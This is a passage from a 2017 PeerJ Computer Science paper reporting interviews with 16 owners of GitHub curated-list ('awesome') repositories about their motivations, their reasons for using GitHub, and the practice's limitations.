by document format, curation process, and are bounded by GitHub features. The addition of built-in tools, such as navigation support within curation projects and automated resources for updates and evaluation, hold potential for improving current practices. Our study contributes to a better understanding of software developers’ motivation to curate resources and the nature of appropriating GitHub features for curation. Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 2/20 https://peerj.com https://github.com/vinta/awesome-python https://github.com/avelino/awesome-go http://dx.doi.org/10.7717/peerj-cs.134 BACKGROUND This section reviews previous literature that explores individuals’ motivation to curate, tools for curation, and current curation practice on GitHub. Motivations to curate in the social media era Curation is a common practice in Archeology. It is the activity of collecting, evaluating, organizing, and preserving a set of resources for future use (Bamforth, 1986). In the Internet era, technology assists curation is commonly referred to by librarians and archivists as ‘‘digital curation’’ to preserve digital materials (Higgins, 2011). It can share features used for social bookmarking, where users specify keywords or tags for the Internet referencing that helps organize and share curated resources with a larger community (Farooq et al., 2007). There are several early popular social bookmarking tools, such as del.icio.us, which allows sharing of personal bookmarks (Golder & Huberman, 2006); Flickr, a photo tagging and sharing service (Marlow et al., 2006); and Reddit, a community-driven link sharing, comment, and rating service (Singer et al., 2014). Curation behaviors have been further studied since social media was appropriated to enable new forms of curation. Specifically, Duh et al. (2012) report the use of a third party tool, Togetter, for curating tweets, and uncover the intended purposes for these curated lists, including recording a conversation, writing a long article, or summarizing an event (Duh et al., 2012). Zhong et al. (2013) conduct surveys of Pinterest and Last.fm users and find that the majority users engage with the curation site for personal interests rather than social reasons (Zhong et al., 2013). A recent study examines the ways that communities leverage a variety of social tools for curation to support vital community activities in a large enterprise environment (Matthews et al., 2014). The authors also call for future studies on curation in public Internet communities (Matthews et al., 2014). Curation on GitHub is a unique instance of curation set apart from the above studies in the following ways. First, the user body of GitHub is drastically different. Services like Twitter, Pinterest, and Reddit, are services for the general population with diverse backgrounds and interests, while GitHub is intended for a focused community of software developers. Members of the software developers’ community share a set of common goals and practices, which is likely to affect their participation in curation practices as well. Second, unlike Pinterest, which itself is designed for curation of links, GitHub is an online work platform designed for software developers to collaborate with others on software projects, and curation is an appropriation of the collaborative coding features of the platform. The reasons behind such appropriation and whether GitHub features fully meet curation needs of developers are yet to be discovered. Third, the technology affordances of GitHub largely depart from the above mentioned services. Tools like Pinterest and Flickr, are designed for personal collection and sharing of hyper links. Reddit allows users to vote to promote links, but it hardly preserves resources. GitHub provides a collaborative working space, i.e., the repository, where software developers can work on the same project together and are enforced by Git workflow. Therefore, GitHub is distinct regarding user base, intended purpose, as well as technology affordances. Its appropriation for curation purpose raises an interesting question concerning user’s motivations and experiences. Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 3/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.134 Software developers’ motivations for participating online communities Researchers report two main categories of motivations that drive software developers’ voluntary participation in open source software projects: (1) internal motivations, i.e., intrinsic motivations, altruism, and community identification, and (2) external rewards, including expected future rewards and personal needs (Hars & Ou, 2001; Ye & Kishida, 2003). Internal factors include ‘‘intrinsic motivation’’, which refers to the feeling of competence, satisfaction, and fulfillment as a motivator to participate in open source projects; ‘‘altruism’’ refers to software developers desire to care for others’ welfare at own cost; and ‘‘community identification’’ refers to individual software developers’ alignment of goals with the larger community. External factors include ‘‘future rewards’’ that are inured when software developers view their participation as investment, and expected future returns, including revenues from related products and services, human capital, self-marketing, and peer recognition; ‘‘Personal needs’’ are software developers’ personal demand for their activity, for example, Perl programming language and Apache web server both grew out of software developers’ self-interests to support their work (Hars & Ou, 2001). Both internal and external factors are important motivations that drive software developers’ participation in open source projects. The rise of social media impacts the way software developers participate in online space. Social media are often referred to as socially enabled tools, where social features are added to software engineering tools (Storey et al., 2014). It lowers the barrier to publishing information, allows fast diffusion, and enables communication at scale, which facilitates a ‘‘Participatory Culture’’ in the software developers’ community (Storey et al., 2014; Jenkins et al., 2009). As a result, software developers increasingly participate in the community via social media that enhances learning, communication, and collaboration (Dabbish et al., 2012; Doll, 2013; Singer et al., 2013). Similarly, software developers are motivated to participate in order to satisfy personal needs (e.g., improve technical skills) and to gain peer recognition (e.g., recognition by the community) (Storey et al., 2014). Despite the well-studied motivations for software developers’ participation in online communities, software developers’ motivation to engage in curation practices within GitHub by appropriating a collaboration software development features are currently under-explored. Prior GitHub research GitHub has drawn attention from researchers in recent years, who have examined its features that promote transparency, such as activity traces, user profiles, issue trackers, sourcecode hosting,and collaboration(Storey et al., 2014; Dabbish et al., 2013). Researchers have examined in detail how such transparency allows software developers to engage with software practices in the community (Dabbish et al., 2012; Doll, 2013; Singer et al., 2013). For example, Dabbish et al. (2012) find that the activity logs and user profiles on GitHub motivate members to contribute to software projects (Dabbish et al., 2012). Marlow, Dabbish & Herbsleb (2013) discover that developers use a variety of social cues available on GitHub to form impressions of others, which in turn moderates their Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 4/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.134 Figure 1 A part of the README.md file of awesome-go curation project. collaboration (Marlow, Dabbish & Herbsleb, 2013). Singer et al. (2013) put GitHub in a largersocial mediaenvironment, and learnedthat softwaredevelopers leverage transparency of socially enabled tools across many social media services for mutual assessment (Singer et al., 2013). These studies focus on how the technology accordances of GitHub and other social media affect software practices, including learning, communication, and collaboration (Storey et al., 2014). Curation as an emerging practice on GitHub raises interesting questions as to the reasons that such practice is thriving in the software developers’ community, why it emerges and gains popularity on GitHub, and whether GitHub features fully support this type of practice. Appropriating GitHub for curation Curation practices are enabled by GitHub features. Specifically, GitHub introduces a README.md file in the root directory of each repository. The contents of the README.md file are displayed in the front page of the repository, i.e., if a user visits the URL of a software repository hosted on GitHub in a browser, the README.md file will be displayed as a web page (Fig. 1) (https://github.com/avelino/awesome-go) along with repository structure and some project statistics, such as the number of forks and Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 5/20 https://peerj.com https://github.com/avelino/awesome-go http://dx.doi.org/10.7717/peerj-cs.134 stars (McDonald & Goggins, 2013). The content of REAME.md file can be structured with Markdown syntax (https://help.github.com/articles/basic-writing-and-formatting- syntax), which provides rich text features, including table of contents, links, tables, etc. README.md is designed for adding description and documentation for a repository (https://help.github.com/articles/create-a-repo). Curation on GitHub appropriates the README.md file of a repository to create a list of resource indexes within one page. It categorizes resources into different themes and differentiates them into sections. Typically, each resource is recorded with the resource name and a brief description of the resource (see Fig. 1). In addition, URLs are attached to each of the curated items. Clicking a resource name (shown in blue in Fig. 1) will direct the user to the real web location of the resource. METHODOLOGY To explore and understand software developers’ experiences appropriating GitHub for curation, we conducted a qualitative study with 16 curation project owners. The study was approved by Penn State University Institutional Review Board, under the approval number PRAMS00044217. In this section, we describe our recruitment procedure, interview protocol, and data analysis processes. Participants recruitment To identify participants engaged in curation practices, we queried the GitHub search API on 12/07/2015 using the keyword ‘‘curated list’’ to search for curation repositories. The query returned 896 repositories hosted on GitHub. We recorded the owner’s user ID for each repository in the list, then we queried GitHub API again to fetch profiles with email addresses of each ID. The query returned 405 unique owners with email addresses, which we used to create a randomized list and sent 172 email invitations to curation project owners. Recipients were asked to engage in a semi-structured online text-based interview carried out via Facebook Messenger, Skype, or Google Hangouts. We began our recruitment process in early December 2015 and completed all interviews in late January 2016. The resulting 16 participants included 15 males and one female with GitHub experiences ranging from six months to six years. Fourteen of the participants are professional software engineers, one was a graduate student, and one was a microbiologist. Eleven participants used the descriptive word ‘‘awesome’’ as the prefix to name their curation repository. The participants had a varying number of followers: five had less than 10 followers; eight had between 10 and 50 followers, and four had more than 50 followers. In the following section, we refer to individuals by participant number (from P1 to P16). Interview protocol We conducted text-based online interview with participants, and each discussion lasted approximately 30 to 60 min. The interviews were semi-structured by the four general areas below. • Motivations to curate resources, • Reasons for technology choice (GitHub), Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 6/20 https://peerj.com https://help.github.com/articles/basic-writing-and-formatting-syntax https://help.github.com/articles/basic-writing-and-formatting-syntax https://help.github.com/articles/create-a-repo http://dx.doi.org/10.7717/peerj-cs.134 Table 1 Summary of the coding scheme. Theme Category Count (n = 16) Altruism 10 Personal needs 15Curator motivations Peer recognition 5 Familiarity with GitHub 9 Reasons for appropriating GitHub Relevant context and audience 13 Supporting work 7 Learning a new topic 8Usefulness of curated list Communication 10 Immature format 7 Hard to maintain 5Limitations of curation Difficult to market 5 • How curated lists are useful, • The limitations of current curation practices (on GitHub). Questions were administered conversationally to engage the participants, and they were open-ended enough that we could pursue new topics raised by the participant. Participants were interviewed in English. The interview scripts were then downloaded for analysis. Data analysis procedure We conducted our iterative analysis through four rounds of interviews allowing the first round of analysis to guide our second round of interviews, and following similarly in the third and the fourth. Themes and codes were identified, discussed, and refined in this process (Lacey & Luff, 2001). In the first round of analysis, we performed open coding on the responses (Strauss, 1987), grouping examples that are conceptually similar. For each subsequent round of interview, we compared concepts and categories that are similar to previous ones. And in this process, we continued to refine our coding scheme while also revealing new ones. We discussed the codes collaboratively and repeatedly. We concluded the study after reaching the point of theoretical saturation, when categories, themes, and explanations repeated from the data (Marshall, 1996). A second researcher independently coded four sample interviews transcripts. Our analysis showed inter-coder agreement between the two researchers (kappa = 0.73). In the process of coding, we recognized that some themes and categories are consistent with prior literature, i.e., curator motivations (altruism, personal needs, and peer recognition). Instead of developing new categories, we labeled them according to existing literature. The complete coding scheme is shown in Table 1. RESULTS The results of our analysis describe curation practices on GitHub from the aforementioned four aspects, including (1) motivations to curate, (2) technology choice, (3) the use of Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 7/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.134 curated resources, and (4) the current limitations of curation practices on GitHub. The analysis is presented through a count of themes present in coded interviews (Table 1) and representative quotes from each of the four themes. Motivations to curate Internal factors (i.e., altruism, community identification, and intrinsic motivation) and external rewards (i.e., personal needs and peer recognition) are identified as motivating factors in software developers’ participation in open source software projects (Hars & Ou, 2001). In this study, our participants confirmed altruism (62.5%), personal needs (93.8%), and peer recognition (31.2%) motivated their participation in curation projects. Internal factors—altruism Participants reported that they engaged in curation practices because other community members might benefit from their effort. For example, P3 believed the high quality of curated resources could help beginners with programming: ‘‘I see so many people when they take introductory classes in programming, they come to GitHub to get ready repositories...and that is overwhelming at first...so to get the started and motivated with programming I thought of collecting resources together in (P3’s curation project)’’—P3 P6 wanted to help people who were in a similar position to himself: ‘‘I’m a kind of remote engineer, then I want to create a list for someone tend to like me about product manager list, I just want to save some links for my learning purpose ... then public for someone if they’re in need’’—P6 External rewards Personal needs and peer recognition form software developers’ external rewards derived from participating in open source projects (Ye & Kishida, 2003). These rewards also drive engagement in curation practices. Personal needs were the most discussed reason for participation in curation (93.8%). Specifically, software developers reported that curation repositories improved productivity and enabled communication with others. Before creating curation projects, half of participants who were familiar with a particular set of resources relied on search engines whenever they tried to locate the URL of the resource. One important reason they chose to curate resources was to avoid such repetitive search efforts. ‘‘Before making the repo I had to do research each time I needed a (P12’s curation topic). Now that I have a list, I just refer back to it when needed.’’—P12 ‘‘I simply created my own list of the sites I found to be good. The idea really was to get out there scout for sites once and then be able to come back to a list without worrying about it having sites I found bad.’’—P9 In addition, a curated repository has a permanent URL, which was reported as a convenient way to share resources with others who were outside of curation repositories. Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 8/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.134 Participants stated that with curation projects, they only needed to point others to the URLs of their curation repositories. It was both convenient for them to share and for others to find. For example, P14 created the curated list so that she could conveniently share curated resources with others. Peer Recognition surfaces as another important motivation for software developers’ participation in curation practices on GitHub. The community of software developers on GitHub adopts a particular way to endorse curation projects. A highly reputable software developer on GitHub, Sindre Sorhus (9.2K+ followers), creates the ‘‘awesome’’ (repository name) project on 07/11/2014, which is a meta list of curated lists (https://github.com/sindresorhus/awesome). It contains a community drafted ‘‘awesome manifesto’’ (https://github.com/sindresorhus/awesome/issues/207), which depicts guidelines and standards for curation practices, and requires that curation repositories conform to it if they want to be included in this meta list. The project currently has around 2,500 watchers, more than 35,000 stars, and approximately 4,000 forks, ranking the 2nd most starred repository created after 01/01/2014 (https://github.com/search?utf8=%E2%9C%93&q=created%3A%3E2014- 01-01+stars%3A%3E1&type=Repositories&ref=earchresults). 11 out of 16 participants used ‘‘awesome’’ as a prefix to their curation project name in an effort to conform to the naming convention as well as to indicate the quality of the content. 10 of them mentioned that they were inspired by the original ‘‘awesome’’ project. 4 of them hoped to get their curation repository indexed by it, and one participant’s curation project was already included in the ‘‘awesome’’ list, who felt a great honor (P10). P12 reported putting effort forward to improve his curated list to conform to the guidelines and standards as defined by the ‘‘awesome’’ project, stating ‘‘...with the Awesome endorsement I’m hoping it becomes a collection people trust’’ (P12). It demonstrated that our participants were putting efforts to align their goals with the larger community, i.e., conforming to the community standard for curating high quality resources, and would like to be recognized by the community. In addition, P14 reported that her involvement in curation efforts helped her obtain her current job, and P10 reported that a company approached him and wanted to collaborate with him on his curated content. These rewards emerged as side-effects of curation efforts, not one of the guiding motivations for software developers to begin a curation project. The technology choice—why GitHub Compared to the GitHub platform, the features on sites like Wikipedia might be considered better suited for hosting curation projects by providing convenient editing and collaborating features. However, popularly used and referenced curation projects for software developers are predominantly hosted on GitHub, whose features and information structures are designed for source code hosting and project collaborating (Marlow, Dabbish & Herbsleb, 2013; Storey et al., 2014) rather than creating and preserving lists of resources. In this section, we will address why curation has emerged as a common way to appropriate GitHub repositories. Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 9/20 https://peerj.com https://github.com/sindresorhus/awesome https://github.com/sindresorhus/awesome/issues/207 https://github.com/search?utf8=%E2%9C%93&q=created%3A%3E2014-01-01+stars%3A%3E1&type=Repositories&ref=earchresults https://github.com/search?utf8=%E2%9C%93&q=created%3A%3E2014-01-01+stars%3A%3E1&type=Repositories&ref=earchresults http://dx.doi.org/10.7717/peerj-cs.134 Familiarity with GitHub Participants reported that software developers’ existing knowledge about GitHub and its features, i.e., their strong media literacy (Storey et al., 2014) with GitHub, prompted them to choose this platform to host curation projects. In general, software developers are familiar with GitHub’s text editing format (i.e., Markdown syntax) and are comfortable using it. P4 and P7 both claimed that ‘‘GitHub was a tool that I was familiar with’’ and ‘‘so yes github would be a more natural tool to use.’’ Specifically, software developers are accustomed to writing and formatting text contents with Markdown syntax. For example, P11 expressed that ‘‘...I love write in markdown format!’’, and P5 considered that ‘‘Github has a really easy way to write content in rich format (using Markdown) and view it.’’ ‘‘...as developer, I think github is the best place for developer to collaborate with other to build good resource.’’—P15 Intimate knowledge about GitHub collaborating features is another factor: ‘‘Github is a really good platform to collaborate. Anyone could come, fork it, extend it and ask me to ‘Merge’ it (update my list).’’—P5 ‘‘...the advantage of using Github is other people can contribute easily.’’—P4 Relevant content and potential audience Participants also chose GitHub for curation because: (1) the curated contents were relevant within the GitHub context, (2) there was a large potential audience on GitHub, and (3) the GitHub community encouraged contributions. A total of 15 out of 16 participants’ curation projects were related to software development practices. They considered GitHub just suitable as a platform for sharing software development related contents: ‘‘...(it is) the place to be for projects like this’’ (P2). GitHub has attracted a large base of like-minded users when it comes to software devel- opment, which increases the chances of matching resources with an interested audience: ‘‘GitHub has a very large audience/devs actively spending time in it, so it’s definitely the right place to publish a project such as this...’’—P1 In addition, hosting curation projects on GitHub encourages contributions. GitHub has many collaborative features. It is a common practice on GitHub for users to contribute to other projects (Dabbish et al., 2012; Marlow, Dabbish & Herbsleb, 2013; Wu et al., 2014). P12 reported that ‘‘GitHub can target at the right audience, and contributing is encouraged more...’’. P8 claimed that ‘‘...enable other people to (freely) contribute to it is very important to me (and I think other curators also feel the same) so a Git hosting site is ideal.’’ Participants also believed that other people on GitHub, who had more experiences and knowledge than themselves and other could enhance the repositories by contributing to lesser developed parts of the repository. ‘‘The main reason is collaboration...I may have some resources but other people may have even better stuffs or ideas to share.’’—P3 Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 10/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.134 The use of curated resources Curated resources are useful for software developers to support their work, learn about a new topic, as well as communicate with others. Supporting work Software developers rely on others’ work to accomplish their own projects. Participants reported that they used different curated lists, including their own, as bookmarks or references to quickly locate the resources they need. ‘‘Before making the repo I had to do research each time I needed a (resources). Now that I have a list. I just refer back to it when needed. It serves as a good toolkit for future projects.’’—P12 ‘‘I recently have created a Python repository and since I was not used with Python at all, I used awesome-python to know some libraries recommended by the community.’’—P11 In addition to supporting their work, participants also used the curation repository to keep track of high-quality resources in case they need them in the future. For example, ‘‘If I used it or I’m planning to use it, I’ll add it there. If the resource is well written with tests and should be considered while selecting specific category, I’ll add it too... but also I add (resources) that I checked already and found it interesting for the future projects.’’—P16 Learning a new topic When first encountering new development related topics, software developers often find themselves feeling overwhelmed. The complex information scope in the software developers’ community makes it hard for developers to start tasks quickly. For example, P6 reported that ‘‘when we start to learn new thing, there are many things, we cannot know what should to spend time on.’’ A curated list that provides centralized peer-reviewed resources about a specific topic provides a starting point where developers know that they can find high-quality resources and begin learning the subject. ‘‘...I’m an iOS engineer. But someday I like to learn Ruby, I just go to awesome-ruby and pick some recourse for beginner. Googling is not going to help us like that.’’—P6 ‘‘So say if I starting to learn a new tool and need to get started quickly. I might go to the main awesome list and search for it.’’—P5 Communication Communication is essential among software developers in order to transfer knowledge between stakeholders, as well as facilitate learning, coordination, and collaboration (Storey et al., 2014). Curation serves important communication purposes, including reduction of communication costs and creating a shared knowledge space. ‘‘I’m relative active in the meetup community in (P14’s location). Talking to people, there is always a lot of talk about what makes a good (P14’s curation topic). I created Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 11/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.134 list so that I can point to other easily... I refer a lot of people to the list who are looking at improving their (P14’s curation topic).’’—P14 One can share the content of resources with others in the current time as well, as reported by P7: ‘‘...I sometimes encounter people who’ve watched (P7’s curation repository) and didn’t really like them, but my hunch is they haven’t seen the great ones, so I send them to check out my list to see if I can convince them otherwise...’’—P7 Limitations of using github for curation In this section, we summarize constraints that our participants have encountered when carrying out curation on GitHub. Immature structure and format of current curated lists The README.md file on GitHub typically includes an introduction to each project and current curation practices mainly rely on that single README.md file to list all curated resources. Sometimes a list may grow excessively long. Participants complained that ‘‘resources are not searchable (when on a list)’’ (P4), and it was cumbersome for them to navigate through a long list: ‘‘The only thing sometimes that nags me is that some of them are very long, which in some sense defeats the purpose.’’—P5 In a case where a curated list was too long, P6 created a shorter version of the same topic by selecting resources most important to him: ‘‘there is another remote list...lot of stars, around 5k or more, but I find it that there are lots of resources, then when I look into, I’m scared of. Then I want to create my own list, just something I think useful for most.’’—P6 Another issue raised is that the brief description of each item in the curated list (noted in Fig.1) can be incorrect, inaccurate, or misleading: ‘‘Bad description doesn’t allow finding the required resource.’’—P16 Further, although these curated lists are intended to be collaborative efforts (i.e., multiple people suggest adding, deleting, or updating entries), there is no intuitive way for an audience to express their opinions or raise uncertainties about resources, only modify content. One participant suggested including a rating system in the curated list to help audience filter resources: ‘‘...maybe it would be better we could Like/Dislike the resources ...sometimes the resources are sorted by name when popularity would be a better option... something like this would give us an overview of how much important some entry in a list is for the community.’’—P11 Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 12/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.134 Excessive efforts to filter and maintain resources It requires a lot of time and efforts to navigate in this complex information space where curation takes place and to filter a handful of good resources. P14 emphasized the time constraints for curation: ‘‘Time. Time is hard...Digging through all of these resources takes time, and I’m usually pretty time constrained.’’ (P14). Due to the fast changing nature of the software industry, old resources become outdated and new resources emerge instantly. Curation repositories require efforts to be simply maintained, including getting rid of the outdated resources, and adding state-of-the-art resources. P16 reported that one drawback of the current curation practices was that curated resources have ‘‘no quality update.’’ Difficulties for marketing Although GitHub contains a vast and relevant user base, it does not provide mechanisms for a repository owner to distribute the list directly to the relevant audience. Our participants expressed that it was hard for them to target their repositories to users who were interested in the curation topic. For example, P10 conveyed his desire to recruit more contributors: ‘‘the only drawback is the lack of pull requests. I want more... (I want to) discover datasets I missed.’’—P10 And P4 found that it was demanding to reach out to both potential collaborators and consumers: ‘‘While it’s easy to host a project on github, you still need to put effort into marketing it, so you get other people contributing or finding it.’’—P4 Unlike social media services such as Facebook, which automatically curates and recommends personalized content for each user, GitHub only contains technical features to allow users to search for information. If GitHub users are not aware of the existence of such curation projects, it would be difficult to find these resources in the first place. Therefore, admitting curation projects are embedded in the context of an abundant potential audience, they still lack mechanisms and features for marketing to parties of interest. DISCUSSION Our study provides an in-depth view of curation practices on GitHub. We first assessed curator motivations in participating in curating activity, and compared them with motivations in open source participation literature. Then, we analyzed the reasons that GitHub was chosen for curation purposes. Next, we evaluated the implications of curation repositories to software developers’ community. And finally, we uncovered the current limitations of curation practices. In this section, we generalize these main findings and discuss design suggestions with the hope to improve curation practice in the future. Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 13/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.134 Curator motivations One primary motivation for engaging in curation is altruism, which is also widely recognized as an important motivation for software developers’ participation in open source projects (Hars & Ou, 2001; Lakhani & Wolf, 2003; Ye & Kishida, 2003). This finding indicates that helping behaviors may be a common reason why software developers are motivated to participate in some online activities. Thus, when designing systems for facilitating software development related practices, we should consider software developers’ desire to support each other. Enjoyment-based intrinsic motivations are the primary reason that software developers take part in open source projects, but were not specifically mentioned by the participants as a drive for engaging in curation. Researchers have learned that intrinsic motivations drive software developers to spend more time and effort on open source projects (Lakhani & Wolf, 2003), and it is positively reinforced by community recognition (Ye & Kishida, 2003). Therefore, many software developers commit themselves to open source projects for a relatively long time. At the same time, altruism alone is recognized as an unsustainable incentive for open source participation (Ye & Kishida, 2003). The comparison of motivations to curation with participation in open source projects leads to questions concerning curators’ long-term engagement, such as whether intrinsic motivations are involved in driving curators, whether altruism can sustain curator’s long-term participation in curation activities, and if not, whether there is a mechanism that regularly feeds curators’ motivations to curate. The answers to these questions are beyond the scope of this study and requires further investigation. Leveraging github as a tool for communication While GitHub is known as a tool for software projects hosting and collaborating (Dabbish et al., 2012; Marlow, Dabbish & Herbsleb, 2013), and communicating knowledge in software artifacts (Storey et al., 2014). This study finds that GitHub is also a good tool for communication of socially generated resources for developers. Here, we describe the features that have supported this practice. First, GitHub features allow curation repositories to be shared easily. With a robust version control system as we as uniquely assigned public URL for each GitHub repository, GitHub guarantees the integrity and durability of curated contents and enables easy sharing. These technical features make GitHub repositories ideal for communicating resources with others. Second, GitHub attracts potential audiences who can contribute to curation repositories. By connecting to relevant audience group, GitHub allows others to suggest potential curated items and evaluate existing ones. As such, the emerging of curation repositories indicates that software developers’ community starts to utilize GitHub for communicating knowledge that is socially generated and maintained (Storey et al., 2014). GitHub as a communication tool establishes its flexibility and reconfigurability. With a simple appropriation of its features, GitHub becomes a favorite tool intended for curation purposes in software developers’ community. Such reconfigurability will lead to other practices besides curation, which can further benefit software developers’ community. For Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 14/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.134 example, GitHub users started to appropriate GitHub repositories to write and publish software development related books (https://github.com/getify/Functional-Light-JS/), which accepted community suggestions as well as changes. Also, software developers initiated sharing training materials for others to discuss related matters as well as retrieving improvements (https://github.com/kentcdodds/es6-workshop). Curation to strengthen software developers’ community Onboarding new members and educating existing members are essential for communities of practice to sustain and grow (Lave & Wenger, 1991; Wenger, 1998; Wenger & Snyder, 2000). The results of this study demonstrate that curation repositories on GitHub reflect these core utilities of communities of practices. Software development related resources are changing rapidly, and software developers usually rely on a number of services and channels, such as Stack Overflow and Twitter, to keep themselves up-to-date with the trend (Storey et al., 2014). By centralizing peer-reviewed resources in an active community of relevant audience, curation repositories create a reliable channel that simplifies the process of discovering high quality resources. They are likely to reduce the amount of efforts individual member of the community spent on locating and filtering the resources. In addition, as the curated resources are peer-reviewed, they are more likely to guide one’s learning of a certain topic than random resources encountered on the Internet. Thus curation repositories optimize the way that resources are disseminated and consumed in software developers’ community, which in turn helps the community to grow. The importance of curation for the software developers’ community also raises interesting questions concerning the professional trajectories of the curators in the community. Curators relate the resource providers, i.e., software developers who develop tools, packages, frameworks, etc., with resource consumers, i.e., software developers who need to learn or work with tools, packages, frameworks, etc. In this sense, they are similar to brokers, who bridge different groups and control information flow in a community, and often bargain for better terms because of their unique positions (Burt, 2004; Burt, 2005; Van Liere, 2010). However, the existing studies of brokers either happen in the cooperate environment (Burt, 2004; Burt, 2005) or community networks (Carroll, 2012), and the brokerage is resulted from establishing social connections, which leads to social capital gain (Carroll, 2012; Burt, 2005; Van Liere, 2010). In contrast curators broker information by creating artifacts in an online social network environment. In this study, we have one participant who obtained a new job in part due to her work on a curation repository. However, whether curation helps curators bargain for better terms in general, and whether curators established social ties and how long such social ties exist as a result of curation requires future investigation. Design implications and future directions Our analysis describes GitHub as a technical infrastructure that meets the needs of curation practices. However, there is still substantial room for curation practices to improve. Our participants found that curating software related contents required a great deal of effort to filter resources and to actively maintain the existing ones. In addition, as the length of Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 15/20 https://peerj.com https://github.com/getify/Functional-Light-JS/ https://github.com/kentcdodds/es6-workshop http://dx.doi.org/10.7717/peerj-cs.134 the curated list grows, it also creates navigational difficulties. The current conditions could be improved by (1) empowering curation with automated filtering tools, and (2) adding navigational support within a curated list. Automated tools can reduce the amount of effort curators need to spend on curating processes. Curators currently do manual selection and evaluation of potential resources as well as eliminating outdated resources. Selections are usually achieved by employing search engines or following recommendations from others. Automated tools can help curators reduce the manual efforts spent on finding and maintaining resource lists. For example, some of our participants manually refer to third party tools to check resources status, such as last-updated-date. An automated tool that checks and filters resources according to query fields can largely diminish the noise and reduce time and efforts to select and evaluate resources. In addition, an automated tool can also help maintain existing resources, by checking whether a software project is still under active development or it is deprecated. Providing navigational support aims at solving the following issues: (1) lengthy curated list, (2) lacking a search function, and (3) lacking common themes across different curation projects. To be more specific, anchored table of contents, which is fixated on the screen, gives readers a clear structure of a document, as well as enables them to jump among sections. This change would make navigating a long list easier. Adding a search function within a curation repository, allowing users to query keywords of the curated items, can help users explore and find ideal resources promptly. Also, templates can provide common structure and themes in different curation repositories. For instance, our participants mentioned that one of the features they wanted for each curation repository to have was to include a beginner’s section, where they could easily find out hands-on resources. Curation repositories could adopt a template that includes commonly identified themes, so that users will be familiar with the structure of different curation repositories and thus locate resources more efficiently. Future work should seek feedback from GitHub users who are consumers of resources in curation projects. Together with what we have learned from this study, we will design and implement tools to help curators select, evaluate, and maintain resource lists more effectively, and allow users to navigate and retrieve desirable resources readily. Limitations Our study was a qualitative investigation of self-reported curation practices and experiences of GitHub developers. More specifically, we did not carry out a controlled study to manipulate hypothesized causal relationships among constructs. Also, due to our limited sample size, cross tabulations among responses were unlikely to be generalizable to the larger population of curation repository owners. A general limitation of qualitative field methods is that some well-known approaches to validity, associated with positivist science, cannot be employed, such as construct validity, statistical validity, or predictive validity. For a qualitative research design such as ours, credibility and transferability are key validity issues: credibility is whether the results are believable and transferability refers to the degree to which the results can be transferred to other settings (Guba, 1981; Hoepfl, 1997). Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 16/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.134 Credibility. We tried to ensure credibility by having two researchers code the data independently, and then calculating the kappa statistic to assess coding agreement. In addition, we used member checking in the interview process to have participants directly corroborate findings. These two approaches were encouraging and convergent, indicating very good credibility for our reported findings (Lincoln & Guba, 1985). We acknowledge that this is only a starting point in understanding curation practices in GitHub, but it succeeded in raising many issues that could be pursued now in more constrained research designs. Transferability. There are several potential threats to the transferability of this study. First, the owners of the most popular curation repositories did not respond to our interview invitation. Given those celebrity curators’ massive audience base and extensively received contributions and attentions, their motivations and practices might be different from the general curators we focused in this study. Second, the way we recruited our participants was to use the keyword ‘‘curated list to search through repository descriptions on GitHub and identified repository owners as our potential interviewers. This search method is transparent and direct, but may have missed curation repositories and owners that did not self-identify with our keywords. Follow-up research can expand the criteria for identifying repositories to further develop our findings. Finally, all of the curators we investigated were recruited on public GitHub, so our results may not generalize to closed source systems. This is another direction for subsequent research to develop our initial findings. CONCLUSION This study seeks to close a gap in the literature by providing a greater understanding of the motivations that software developers appropriate GitHub for curation, and their experiences with that practice. By conducting in-depth interviews with 16 participants about their curation experiences, we uncovered that curators were motivated by altruism, personal needs, and peer recognition, which were comparable to motivations to participate in open source projects. Whether these motivations support long-term participation in curation practice is yet to be discovered. Curation repository is an appropriation of an online collaborative working tool, indicating that software developers’ community starts to leverage GitHub as a tool for communicating socially generated knowledge. It reflects the flexibility and reconfigurability of the tool. And other similar practices, such as sharing course curriculum on GitHub, start to surface. In addition, curation repositories serve important functions of communities of practice. They support software developers’ work, guide learning through an engineering topic, and communications within the community. Curation practice strengthens software developers’ community and can help it grow. Finally, current curation practices are limited by lacking standard formatting, tools for helping curators find and maintain existing curated resources, and reaching the target audience, which creates opportunities for future improvements. Wu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.134 17/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.134 ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests John M. Carroll is an Academic Editor for PeerJ Computer Science. Author Contributions • Yu Wu conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Na Wang conceived and designed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Jessica Kropczynski conceived and designed the experiments, contributed 